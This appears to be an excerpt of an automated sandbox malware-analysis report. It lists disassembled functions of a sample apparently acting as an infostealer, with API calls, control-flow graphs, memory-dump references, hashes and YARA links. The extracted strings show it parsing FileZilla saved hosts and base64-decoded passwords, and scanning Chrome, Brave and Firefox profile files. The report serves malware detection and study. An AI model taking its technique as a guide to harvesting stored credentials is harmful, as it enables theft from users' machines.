                              Function 00596000 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 819stringnetworkCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059602F
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596082
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005960B5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005960E5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596120
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00596153
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00596163
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: 72adb650980f8a036a645d2cc8609e434a2302d19248d1b40fa7cf64d995ef52
                              • Instruction ID: 2d56fffd6e9ee5a059aa613a0d916b9974e25bf29a53562da0e825a6f0489d80
                              • Opcode Fuzzy Hash: 72adb650980f8a036a645d2cc8609e434a2302d19248d1b40fa7cf64d995ef52
                              • Instruction Fuzzy Hash: 52524F3191161AABDF10AFB4DC8DAAE7BB5FF84700F158428F905A7251DB34EC46CBA4
                              Function 005A6FF9 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7290 5a6ff9 7291 5a7000-5a7008 7290->7291 7291->7291 7292 5a700a-5a7015 call 592840 7291->7292 7295 5a7023-5a702b 7292->7295 7296 5a7017-5a701d lstrcpy 7292->7296 7297 5a703a-5a7045 call 592840 7295->7297 7298 5a702d 7295->7298 7296->7295 7302 5a7053-5a705b 7297->7302 7303 5a7047-5a704d lstrcpy 7297->7303 7299 5a7030-5a7038 7298->7299 7299->7297 7299->7299 7304 5a706a-5a7075 call 592840 7302->7304 7305 5a705d 7302->7305 7303->7302 7309 5a7083-5a708b 7304->7309 7310 5a7077-5a707d lstrcpy 7304->7310 7306 5a7060-5a7068 7305->7306 7306->7304 7306->7306 7311 5a709a-5a70a7 call 592840 7309->7311 7312 5a708d 7309->7312 7310->7309 7316 5a70a9-5a70af lstrcpy 7311->7316 7317 5a70b5-5a70ce GetProcessHeap RtlAllocateHeap 7311->7317 7313 5a7090-5a7098 7312->7313 7313->7311 7313->7313 7316->7317 7318 5a75f0-5a761a lstrlen call 592840 7317->7318 7319 5a70d4-5a70e2 StrStrA 7317->7319 7329 5a762b-5a76f0 call 591410 call 5aef30 call 592930 * 18 7318->7329 7330 5a761c-5a7621 7318->7330 7320 5a715c-5a716a StrStrA 7319->7320 7321 5a70e4-5a710e lstrlen 7319->7321 7324 5a716c-5a7196 lstrlen 7320->7324 7325 5a71e4-5a71f2 StrStrA 7320->7325 7346 5a7110-5a7115 7321->7346 7347 5a7117-5a7124 call 592840 7321->7347 7349 5a7198-5a719d 7324->7349 7350 5a719f-5a71ac call 592840 7324->7350 7326 5a726c-5a727a StrStrA 7325->7326 7327 5a71f4-5a721e lstrlen 7325->7327 7334 5a73ea-5a73f7 lstrlen 7326->7334 7335 5a7280-5a72aa lstrlen 7326->7335 7357 5a7220-5a7225 7327->7357 7358 5a7227-5a7234 call 592840 7327->7358 7330->7329 7331 5a7623-5a7625 lstrcpy 7330->7331 7331->7329 7338 5a73fd-5a740a lstrlen 7334->7338 7339 5a75d0 7334->7339 7369 5a72ac 7335->7369 7370 5a72b7-5a72c5 call 592840 7335->7370 7338->7339 7344 5a7410-5a7420 lstrlen 7338->7344 7343 5a75d3-5a75ea 7339->7343 7343->7318 7343->7319 7344->7343 7353 5a7426-5a7430 lstrlen 7344->7353 7346->7346 7346->7347 7362 5a712e-5a7133 7347->7362 7363 5a7126-5a7128 lstrcpy 7347->7363 7349->7349 7349->7350 7375 5a71ae-5a71b0 lstrcpy 7350->7375 7376 5a71b6-5a71bb 7350->7376 7353->7343 7360 5a7436-5a750d lstrcat * 14 lstrlen 7353->7360 7357->7357 7357->7358 7387 5a723e-5a7243 7358->7387 7388 5a7236-5a7238 lstrcpy 7358->7388 7367 5a750f-5a7511 call 592930 7360->7367 7368 5a7516-5a7523 call 592840 7360->7368 7373 5a713a-5a7147 call 592840 7362->7373 7374 5a7135 call 592930 7362->7374 7363->7362 7367->7368 7389 5a7531-5a7543 lstrlen 7368->7389 7390 5a7525-5a752b lstrcpy 7368->7390 7379 5a72b0-5a72b5 7369->7379 7391 5a72cf-5a72d4 7370->7391 7392 5a72c7-5a72c9 lstrcpy 7370->7392 7405 5a7149-5a714b 7373->7405 7406 5a7155-5a7157 call 592930 7373->7406 7374->7373 7375->7376 7385 5a71bd call 592930 7376->7385 7386 5a71c2-5a71cf call 592840 7376->7386 7379->7370 7379->7379 7385->7386 7417 5a71dd-5a71df call 592930 7386->7417 7418 5a71d1-5a71d3 7386->7418 7397 5a724a-5a7257 call 592840 7387->7397 7398 5a7245 call 592930 7387->7398 7388->7387 7401 5a754a-5a7557 call 592840 7389->7401 7402 5a7545 call 592930 7389->7402 7390->7389 7403 5a72db-5a72e9 call 592840 7391->7403 7404 5a72d6 call 592930 7391->7404 7392->7391 7421 5a7259-5a725b 7397->7421 7422 5a7265-5a7267 call 592930 7397->7422 7398->7397 7428 5a7559-5a755f lstrcpy 7401->7428 7429 5a7565-5a7577 lstrlen 7401->7429 7402->7401 7430 5a72eb-5a72ed 7403->7430 7431 5a72f7-5a731c call 592930 CryptStringToBinaryA 7403->7431 7404->7403 7405->7406 7414 5a714d-5a714f lstrcpy 7405->7414 7406->7320 7414->7406 7417->7325 7418->7417 7419 5a71d5-5a71d7 lstrcpy 7418->7419 7419->7417 7421->7422 7426 5a725d-5a725f lstrcpy 7421->7426 7422->7326 7426->7422 7428->7429 7433 5a7579 call 592930 7429->7433 7434 5a757e-5a758b call 592840 7429->7434 7430->7431 7435 5a72ef-5a72f1 lstrcpy 7430->7435 7431->7334 7444 5a7322-5a7332 LocalAlloc 7431->7444 7433->7434 7445 5a7599-5a75a8 lstrlen 7434->7445 7446 5a758d-5a7593 lstrcpy 7434->7446 7435->7431 7444->7334 7447 5a7338-5a7351 CryptStringToBinaryA 7444->7447 7451 5a75aa-5a75ac call 592930 7445->7451 7452 5a75b1-5a75c0 call 592840 7445->7452 7446->7445 7449 5a735f-5a736e lstrlen 7447->7449 7450 5a7353-5a735a LocalFree 7447->7450 7454 5a7370-5a7372 call 592930 7449->7454 7455 5a7377-5a7383 call 592840 7449->7455 7450->7334 7451->7452 7452->7343 7465 5a75c2-5a75ce lstrcpy 7452->7465 7454->7455 7467 5a7391-5a73a7 lstrlen call 592840 7455->7467 7468 5a7385-5a738b lstrcpy 7455->7468 7465->7343 7474 5a73a9-5a73ab 7467->7474 7475 5a73bd-5a73bf 7467->7475 7468->7467 7477 5a73c8-5a73d5 call 592840 7474->7477 7478 5a73ad-5a73b7 lstrcpy lstrcat 7474->7478 7475->7477 7479 5a73c1-5a73c3 call 592930 7475->7479 7485 5a73e3-5a73e5 call 592930 7477->7485 7486 5a73d7-5a73d9 7477->7486 7478->7475 7479->7477 7485->7334 7486->7485 7488 5a73db-5a73dd lstrcpy 7486->7488 7488->7485
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A701D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A704D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A707D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A70AF
                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 005A70BC
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005A70C3
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 005A70DA
                              • lstrlen.KERNEL32(00000000), ref: 005A70E5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A7128
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A714F
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 005A7162
                              • lstrlen.KERNEL32(00000000), ref: 005A716D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A71B0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A71D7
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 005A71EA
                              • lstrlen.KERNEL32(00000000), ref: 005A71F5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A7238
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A725F
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 005A7272
                              • lstrlen.KERNEL32(00000000), ref: 005A7281
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A72C9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A72F1
                              • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 005A7314
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 005A7328
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 005A7349
                              • LocalFree.KERNEL32(00000000), ref: 005A7354
                              • lstrlen.KERNEL32(?), ref: 005A73EE
                              • lstrlen.KERNEL32(?), ref: 005A7401
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 2641759534-2314656281
                              • Opcode ID: dbe39f5018063118462d3c4d30a2c76ad0ef730603c9bfb319a582da4dbcc2f7
                              • Instruction ID: b58c3e4e8c4d017f6a9023ad5a60c9ca31b26d200d993efea4caea25169a5419
                              • Opcode Fuzzy Hash: dbe39f5018063118462d3c4d30a2c76ad0ef730603c9bfb319a582da4dbcc2f7
                              • Instruction Fuzzy Hash: 21026E71A1521AAFCB10ABB4CC4DFAE7FB9BF49B00F144418F905E7251EB78D9418BA4
                              Function 0059DD70 Relevance: 92.3, APIs: 48, Strings: 4, Instructions: 1264stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059DDC3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059DE0E
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059DE4F
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 0059DE7F
                              • FindFirstFileA.KERNEL32(?,?), ref: 0059DE90
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 157892242-726946144
                              • Opcode ID: 745fe1af543fd114e558be54fdffc85859fa26e43f544d0a271baec59330be5f
                              • Instruction ID: ee18a434f5891d7c8d23c29ccb6db1719e8455244fb2357921c69e139d4f6c1b
                              • Opcode Fuzzy Hash: 745fe1af543fd114e558be54fdffc85859fa26e43f544d0a271baec59330be5f
                              • Instruction Fuzzy Hash: 96B26D71A0121A9FCF64DF65C84AB9A7FF5BF44710F18856DE809AB261EB34EC41CB90
                              Function 005A4EC0 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1096stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A4F02
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4F2B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4F39
                              • lstrlen.KERNEL32(005C5270), ref: 005A4F44
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4F61
                              • lstrcat.KERNEL32(00000000,005C5270), ref: 005A4F6D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4F9B
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A4FB5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: prefs.js
                              • API String ID: 2567437900-3783873740
                              • Opcode ID: c69005f20ee681bf98382b1be740f33ee493e2c09dcab23b9bc1b785c795d2d8
                              • Instruction ID: f714f55b653df6f96eec6871d6ba6abd89a17f52a8c5606b965b3467e4b9f62c
                              • Opcode Fuzzy Hash: c69005f20ee681bf98382b1be740f33ee493e2c09dcab23b9bc1b785c795d2d8
                              • Instruction Fuzzy Hash: DC923C30A017069FDB24CF29C948F6ABBE5BF85714F19C06DE8499B2A1E735DC42CB51
                              Function 005A15C0 Relevance: 62.0, APIs: 41, Instructions: 526stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1602
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1625
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1630
                              • lstrlen.KERNEL32(005C5270), ref: 005A163B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1658
                              • lstrcat.KERNEL32(00000000,005C5270), ref: 005A1664
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1692
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A16AC
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005A16CB
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005A16E3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1720
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1749
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1754
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A175F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A177C
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A1788
                              • lstrlen.KERNEL32(?), ref: 005A1793
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A17B5
                              • lstrcat.KERNEL32(00000000,?), ref: 005A17C1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A17EE
                              • StrCmpCA.SHLWAPI(?,0160DB58), ref: 005A1815
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1856
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A187F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A18B3
                              • StrCmpCA.SHLWAPI(?,0160DF20), ref: 005A18CE
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A190F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1938
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A196C
                              • StrCmpCA.SHLWAPI(?,0160DBB8), ref: 005A1988
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A19B9
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A19E2
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1A0B
                              • StrCmpCA.SHLWAPI(?,0160DA68), ref: 005A1A37
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1A78
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1AA1
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1AD5
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1B24
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1B58
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1B93
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005A1BBB
                              • FindClose.KERNEL32(00000000), ref: 005A1BCA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                              • String ID:
                              • API String ID: 1346933759-0
                              • Opcode ID: bd60861249a962b109740196de3983744539a754b2014fafca03d63b1f50d22a
                              • Instruction ID: 5a6c980f7186819bb10260511ff71318587a6932418fdd7cb1ac20cfed972646
                              • Opcode Fuzzy Hash: bd60861249a962b109740196de3983744539a754b2014fafca03d63b1f50d22a
                              • Instruction Fuzzy Hash: 7E125C706117069BDB24AF79D88DA6F7FE8BF85340F04892CF88587250EB34D8458B99
                              Function 005ACCE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 005ACCFC
                              • FindFirstFileA.KERNEL32(?,?), ref: 005ACD13
                              • lstrcat.KERNEL32(?,?), ref: 005ACD5F
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005ACD71
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005ACD8B
                              • wsprintfA.USER32 ref: 005ACDB0
                              • PathMatchSpecA.SHLWAPI(?,01609698), ref: 005ACDE2
                              • CoInitialize.OLE32(00000000), ref: 005ACDEE
                                • Part of subcall function 005ACBE0: CoCreateInstance.COMBASE(005BB140,00000000,00000001,005BB130,?), ref: 005ACC06
                                • Part of subcall function 005ACBE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 005ACC46
                                • Part of subcall function 005ACBE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 005ACCC9
                              • CoUninitialize.COMBASE ref: 005ACE09
                              • lstrcat.KERNEL32(?,?), ref: 005ACE2E
                              • lstrlen.KERNEL32(?), ref: 005ACE3B
                              • StrCmpCA.SHLWAPI(?,005BD014), ref: 005ACE55
                              • wsprintfA.USER32 ref: 005ACE7D
                              • wsprintfA.USER32 ref: 005ACE9C
                              • PathMatchSpecA.SHLWAPI(?,?), ref: 005ACEB0
                              • wsprintfA.USER32 ref: 005ACED8
                              • CopyFileA.KERNEL32(?,?,00000001), ref: 005ACEF1
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 005ACF10
                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 005ACF28
                              • CloseHandle.KERNEL32(00000000), ref: 005ACF33
                              • CloseHandle.KERNEL32(00000000), ref: 005ACF3F
                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005ACF54
                              • lstrcpy.KERNEL32(00000000,?), ref: 005ACF94
                              • FindNextFileA.KERNEL32(?,?), ref: 005AD08D
                              • FindClose.KERNEL32(?), ref: 005AD09F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                              • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 3860919712-2388001722
                              • Opcode ID: 50790a68bb7f89518099d285142ea6c250e52b417aa2ff21c50d9c0773fa5608
                              • Instruction ID: 09404a23e9182b120de51105bd14b615613f23796f62abfe627ee6a4720eca34
